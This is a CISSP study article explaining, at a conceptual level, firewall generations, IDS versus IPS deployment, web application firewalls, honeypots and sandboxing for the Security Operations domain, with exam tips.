cisspSecurity Operations· 10 min read· 20 May 2026
Firewalls, IDS/IPS, Honeypots, and Next-Gen Security Controls
Network security controls are the technical tools that implement security policies at the network and application layer. For the CISSP exam, these controls are tested at the conceptual level: what does each control do, what are its limitations, where is it deployed, and which control is most appropriate for a given scenario. Domain 7 covers these controls in the context of security operations — how they are managed and monitored, not how they are configured.
Firewall Generations
Firewalls have evolved significantly over time. Understanding the generations and what each can and cannot do is a consistent exam topic.
First generation – Packet filter firewalls examine individual IP packets and make allow/deny decisions based on source IP address, destination IP address, source port, destination port, and protocol. Packet filters are fast and scalable but stateless — they examine each packet in isolation without awareness of connection context. They cannot distinguish between a packet that is part of an established, legitimate connection and a packet that is part of an attack exploiting the same ports. A TCP packet with just the ACK flag set could be passed by a packet filter even though no SYN was seen, allowing attackers to bypass rules.
Second generation – Stateful inspection firewalls track the state of network connections in a state table. A stateful firewall knows which connections have been established (completed the TCP three-way handshake) and allows packets only when they match a known connection state. This prevents the bypasses possible against packet filters. Stateful inspection became the standard for perimeter firewalls.
Third generation – Application layer firewalls (proxy firewalls) understand application-layer protocols and can inspect application content. An HTTP proxy firewall can see the HTTP request method, URL, and payload — not just the TCP port. This allows detection of application-layer attacks (SQL injection embedded in an HTTP parameter) that packet filter and stateful inspection firewalls cannot see. Application layer firewalls operate as proxies, terminating the client connection and initiating a new connection to the server.
Next-Generation Firewalls (NGFW) combine stateful inspection with deep packet inspection, application identification (identifying applications by their traffic patterns regardless of port), user identification (associating traffic with specific users rather than IP addresses), integrated IPS, SSL/TLS inspection (decrypting and re-encrypting TLS traffic to inspect the contents), and threat intelligence integration. NGFWs are the current standard for enterprise perimeter security.
For the exam: packet filter = simple IP/port filtering, no state. Stateful inspection = tracks connection state. Application layer = inspects application content (proxy). NGFW = application awareness + IPS + user identification + SSL inspection.
IDS vs IPS: Detection vs Prevention
Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) monitor network traffic and system activity for signs of malicious behaviour. The critical distinction between them is what they do when they detect a threat.
An IDS detects and alerts. When it identifies suspicious activity, it generates an alert for analyst investigation. An IDS does not take action to block or stop the attack — it is a passive monitoring tool. IDS is deployed in passive/tap mode: it receives a copy of network traffic (via a network tap or port mirror) but is not in the path of live traffic.
An IPS detects and blocks. When it identifies suspicious activity, it automatically takes action to stop it: dropping the malicious packet, resetting the connection, or blocking the source IP. An IPS is deployed inline: all traffic passes through the IPS, giving it the ability to drop traffic. If an IPS fails or is misconfigured, it can block legitimate traffic (a potential availability risk).
Detection methods include: signature-based detection (matching traffic against known attack patterns — effective for known attacks, blind to unknown attacks), anomaly-based detection (comparing current activity against a baseline and alerting on deviations — detects unknown attacks but generates more false positives), and specification-based detection (comparing activity against a defined model of expected behaviour).
False positive management is one of the primary operational challenges for IDS/IPS. A false positive is an alert generated for legitimate traffic — it wastes analyst time and in the case of IPS, may block legitimate business traffic. Tuning IDS/IPS rules to minimise false positives without introducing false negatives (missed attacks) is an ongoing operational activity.
For the exam: IDS detects and alerts (passive, tap/mirror deployment). IPS detects and blocks (inline deployment, can affect availability). False positive management is critical for both.
Web Application Firewall (WAF)
A WAF is a specialised firewall that sits in front of web applications and inspects HTTP/HTTPS traffic for application-layer attacks. While a NGFW provides general network security, a WAF is specifically tuned for web application vulnerabilities.
WAFs protect against: SQL injection (detecting SQL syntax in HTTP parameters), cross-site scripting (detecting JavaScript injected into web requests), cross-site request forgery, HTTP request smuggling, directory traversal, and other OWASP Top 10 vulnerabilities.
WAFs are deployed in one of three modes: transparent proxy (inline, inspects traffic without changing the connection), reverse proxy (terminates the client connection and proxies requests to the backend server), or out-of-band (receives a copy of traffic, can generate alerts but not block in real time).
For the exam: WAF is the specific control for web application attacks. It should be recommended when the question involves protecting a web application against SQL injection, XSS, or other application-layer attacks. A network firewall alone is insufficient for application-layer protection.
Honeypots and Honeynets: Deception Technology
A honeypot is a decoy system designed to attract and detect attackers. It appears to be a legitimate system containing valuable data or services but is actually isolated, monitored, and contains no real business data. Any access to a honeypot is suspicious by definition — legitimate users have no reason to access a decoy system.
Honeypots serve three purposes: early warning (an attacker who accesses a honeypot is detected before they reach real systems), intelligence gathering (observing attacker behaviour on the honeypot reveals their tools, techniques, and objectives), and distraction (an attacker engaged with a honeypot is not attacking real systems).
A honeynet is a network of honeypots that simulates an entire network environment, providing a more realistic and engaging target for sophisticated attackers.
Honeypots raise legal considerations: entrapment laws in some jurisdictions may limit how honeypots can be used, and organisations must be careful that they are not facilitating attacks against third parties through their honeypots.
For the exam: honeypots are detection and intelligence tools. Any access to a honeypot is an alert by definition. They are particularly effective for detecting lateral movement (an attacker who has compromised internal systems may reach internal honeypots that external users would never access).
Sandboxing and AI/ML-Based Detection
Sandboxing is the execution of potentially malicious code in an isolated, monitored environment to observe its behaviour without risk to production systems. Malware sandboxes detonate suspicious files or URLs and analyse their behaviour: what registry keys do they modify, what network connections do they establish, what files do they create or modify?
Sandboxing is effective for detecting malware that evades signature-based detection (unknown malware). Modern malware often includes sandbox detection techniques (VM detection, delayed execution) to avoid analysis, which has led to increasingly sophisticated sandbox environments that attempt to appear as real systems.
AI and machine learning are increasingly embedded in security tools: NGFW threat scoring, EDR behavioural analysis, email security ML models, SIEM anomaly detection, and UEBA platforms all use ML to improve detection accuracy and reduce false positive rates.
Exam Tip
IDS detects and alerts (passive, tap/mirror). IPS detects and blocks (inline, availability risk from false positives). WAF protects web applications from application-layer attacks. Honeypots generate alerts from any access. NGFW is the current perimeter security standard, providing stateful inspection + application awareness + IPS + SSL inspection. The exam tests placement: IPS inline, IDS passive/tap. If a question asks which control blocks attacks automatically, the answer is IPS or NGFW, not IDS.
// PRACTICE_THIS_DOMAIN
Test your knowledge on Security Operations
AI-generated practice questions mapped to this domain. Get instant explanations and track your progress.